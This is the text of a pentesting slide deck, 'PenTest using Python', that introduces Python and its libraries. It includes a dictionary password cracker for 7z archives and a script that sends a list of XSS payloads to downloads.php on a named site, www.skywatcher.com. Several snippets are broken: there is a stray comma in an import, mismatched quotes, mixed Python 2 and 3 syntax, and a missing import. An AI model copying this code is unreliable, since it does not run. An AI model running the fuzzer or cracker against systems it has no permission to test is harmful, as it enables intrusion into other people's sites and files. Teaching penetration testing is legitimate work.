PenTest using Python By Purna Chander
- 1. P U R N A C H A N D E R
Pen-Test Techniques using
Python
- 2. Why?
Easy ( Install, learn, Code)
Tons of Libraries
Code is easy to understand
Multiplatform
Good for Prototyping
Free
- 3. History
Conceived in late 80´s and first implementation in
1989
Created by Guido Van Rossum
Actually there are two branches 2.x and 3.0
- 4. Python
Interpreted language
Object oriented
Indentation is significant in Python, block delimiter.
Usual control structures (if, while, etc)
Multiple levels of organization (function, classes,
modules, packages)
- 5. Who is using Python?
Canvas W3AF
Sqlmap Impacket
Google
ImmunityDebugger
Peach
Sulley
Paimei
Scapy
Spike Proxy
Core Impact
- 6. Data Types
Data types:
Strings - “Hello”
Numbers – 123
Lists – [‘hello’,’2’,’1’]
Tuples - (‘1’,’2’,’3’) (immutable)
Dictionaries – d = {‘key1’:’dog’,’key2’:’cat’}
- 7. Basic Code bits
import sys
ofile = "dictionary.txt"
fil = open(ofile,'r')
x = fil.readlines()
for y in x:
print (y)
- 8. Urllib3
Library to deal with HTTP
import urllib3
http = urllib3.PoolManager()
r = http.request('GET', 'https://python.org/')
print (r.status)
print (r.data)
- 9. 7 Zip Cracker
import os, sys,
pas = open('passwords.txt', 'rb')
password=pas.readlines()
for x in password:
try:
fp = open('test.7z', 'rb')
archive = Archive7z(fp, password=x)
print ”The password is" + x
sys.exit()
except Exception, e:
fp.close()
- 10. Win32Com
Library that allows us to access COM objects in
Win32 systems
We can automate Word, Excel, Powerpoint, access
WMI and etc..
- 11. Excel Processing
from win32com.client import Dispatch
xlApp = Dispatch("Excel.Application")
xlApp.Visible = 1
xlApp.Workbooks.open("test.xls")
for x in range(1,100):
nombre=str(xlApp.ActiveSheet.Cells(x,5))
print nombre
xlApp.Quit()
- 12. WMI
import wmi
c = wmi.WMI ()
for process in c.Win32_Process ():
print process.ProcessId, process.Name
- 14. SCRIPT
import http.client
for xss in xss_array:
#print (xss)
url = 'www.skywatcher.com'
conn = http.client.HTTPConnection(url)
print ( url+ '/downloads.php?cat='+ xss)
conn.request('GET', '/downloads.php?cat='+ xss)
resp = conn.getresponse()
body = resp.read()
if resp.version == 10:
print('HTTP/1.0 %s %s' % (resp.status, resp.reason))
if resp.version == 11:
print('HTTP/1.1 %s %s' % (resp.status, resp.reason))
for header in resp.getheaders():
print('%s: %s' % (header[0], header[1]))
#print ('n', body)
print ("------------------------------------------------------------------------------")
conn.close()